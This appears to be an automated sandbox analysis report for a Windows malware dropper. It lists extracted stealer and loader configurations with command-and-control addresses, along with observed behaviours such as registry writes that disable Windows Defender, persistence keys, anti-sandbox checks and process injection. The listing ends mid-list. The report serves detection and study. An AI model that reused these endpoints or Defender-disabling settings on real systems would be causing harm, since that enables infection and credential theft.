Analysis
-
max time kernel
139s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-11-2024 08:25
Static task
static1
Behavioral task
behavioral1
Sample
6dfd3f8435cb9fda6843ea12c5e83f0d.exe
Resource
win10v2004-20241007-en
General
-
Target
6dfd3f8435cb9fda6843ea12c5e83f0d.exe
-
Size
5.5MB
-
MD5
6dfd3f8435cb9fda6843ea12c5e83f0d
-
SHA1
d2473d2dccb03b38c1e8fa4ecd14242ecf03ed55
-
SHA256
69321782fa34fd498bdeec1689406544090465f528a2f3529326c85c612e444f
-
SHA512
9bc87a4d632db2dc387b92dbd6184ee6ee70a6b517cf9bb95c948bf45b9955042313d59a4f2b59e8ca84130de500dda1a7230a10616fe931613db1f69bcea819
-
SSDEEP
98304:O7fD4kHhAkoh8AnGK6Z0XUkUbfqS50szfHt+6FTujVR/cANZ2dHtKOHVTA13ePeO:GD4oYnlXrUGS5xrtfIUAmdHtKgS1oJ
Malware Config
Extracted
stealc
tale
http://185.215.113.206
-
url_path
/6c4adf523b719729.php
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
5.0
127.0.0.1:8895
162.230.48.189:8895
ZRGtN7NDh24Vx89x
-
install_file
USB.exe
Extracted
lumma
https://founpiuer.store/api
Signatures
-
Amadey family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/5396-9584-0x0000000007370000-0x000000000737E000-memory.dmp disable_win_def -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/5396-6925-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm -
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" d6e331f93f.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection d6e331f93f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" d6e331f93f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" d6e331f93f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" d6e331f93f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" d6e331f93f.exe -
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/5396-9837-0x0000000007600000-0x000000000771E000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 3028 created 3544 3028 tmpE01F.tmp.exe 56 PID 3932 created 3544 3932 aspnet_compiler.exe 56 PID 3420 created 3544 3420 tmp1311.tmp.exe 56 PID 4708 created 3544 4708 tmp136F.tmp.exe 56 PID 3712 created 5396 3712 svchost.exe 159 -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2S3134.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4Y209P.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3H33Q.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0a194f8bd0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6a18abcebc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d6e331f93f.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 7668 powershell.exe 7828 powershell.exe 8120 powershell.exe 5652 powershell.exe 7832 powershell.exe 6588 powershell.exe 8176 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts wdeffp.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6a18abcebc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6a18abcebc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0a194f8bd0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d6e331f93f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3H33Q.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3H33Q.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4Y209P.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4Y209P.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2S3134.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2S3134.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0a194f8bd0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d6e331f93f.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 4Y209P.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation DLER214.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation tmpE01F.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation fvkoke.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation ohrpqf.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation tmp1311.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation tmp136F.tmp.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ContextID.vbs tmpE01F.tmp.exe -
Executes dropped EXE 19 IoCs
pid Process 400 R2L54.exe 5024 2S3134.exe 4512 3H33Q.exe 3128 4Y209P.exe 836 skotes.exe 2252 DLER214.exe 3028 tmpE01F.tmp.exe 4584 0a194f8bd0.exe 5496 6a18abcebc.exe 5532 ba99f65d60.exe 4292 d6e331f93f.exe 1464 skotes.exe 6680 fvkoke.exe 3664 ohrpqf.exe 3420 tmp1311.tmp.exe 4708 tmp136F.tmp.exe 7816 wdeffp.exe 7892 skotes.exe 8056 updater.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 3H33Q.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 4Y209P.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine d6e331f93f.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 2S3134.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 0a194f8bd0.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 6a18abcebc.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features d6e331f93f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" d6e331f93f.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 6dfd3f8435cb9fda6843ea12c5e83f0d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" R2L54.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0a194f8bd0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004054001\\0a194f8bd0.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a18abcebc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004055001\\6a18abcebc.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ba99f65d60.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004056001\\ba99f65d60.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d6e331f93f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004057001\\d6e331f93f.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\github_install = "C:\\Users\\Admin\\AppData\\Roaming\\github_install.exe" tmp136F.tmp.exe -
Power Settings 1 TTPs 16 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5860 powercfg.exe 6580 powercfg.exe 7824 powercfg.exe 7652 powercfg.exe 7840 powercfg.exe 7208 powercfg.exe 3160 powercfg.exe 5556 powercfg.exe 6608 powercfg.exe 4568 powercfg.exe 7844 powercfg.exe 7964 powercfg.exe 2256 powercfg.exe 8004 powercfg.exe 5448 powercfg.exe 6600 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000023cc8-1202.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification C:\Windows\system32\MRT.exe wdeffp.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 5024 2S3134.exe 4512 3H33Q.exe 3128 4Y209P.exe 836 skotes.exe 4584 0a194f8bd0.exe 5496 6a18abcebc.exe 4292 d6e331f93f.exe 1464 skotes.exe 7892 skotes.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 3028 set thread context of 6164 3028 tmpE01F.tmp.exe 148 PID 6164 set thread context of 3932 6164 InstallUtil.exe 154 PID 3932 set thread context of 5396 3932 aspnet_compiler.exe 159 PID 3420 set thread context of 7848 3420 tmp1311.tmp.exe 182 PID 4708 set thread context of 4464 4708 tmp136F.tmp.exe 201 PID 7816 set thread context of 7400 7816 wdeffp.exe 231 PID 8056 set thread context of 6416 8056 updater.exe 264 PID 8056 set thread context of 720 8056 updater.exe 266 PID 8056 set thread context of 6956 8056 updater.exe 271 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 4Y209P.exe -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3476 sc.exe 7656 sc.exe 7032 sc.exe 5392 sc.exe 3464 sc.exe 6724 sc.exe 1688 sc.exe 7512 sc.exe 3132 sc.exe 7216 sc.exe 3588 sc.exe 5520 sc.exe 4220 sc.exe 2960 sc.exe 6444 sc.exe 8144 sc.exe 7972 sc.exe 6300 sc.exe 5768 sc.exe 7204 sc.exe 7428 sc.exe 7460 sc.exe 7764 sc.exe 8052 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 4012 5024 WerFault.exe 87 1720 5024 WerFault.exe 87 5344 4584 WerFault.exe 113 5488 5396 WerFault.exe 159 -
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fvkoke.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmpE01F.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0a194f8bd0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmp136F.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6dfd3f8435cb9fda6843ea12c5e83f0d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language R2L54.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DLER214.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ohrpqf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2S3134.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ba99f65d60.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmp1311.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d6e331f93f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3H33Q.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4Y209P.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6a18abcebc.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
pid Process 3692 ipconfig.exe 5136 ipconfig.exe 3588 ipconfig.exe 7976 ipconfig.exe 5228 ipconfig.exe 6252 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 5912 taskkill.exe 6040 taskkill.exe 2456 taskkill.exe 4968 taskkill.exe 5600 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 6164 InstallUtil.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
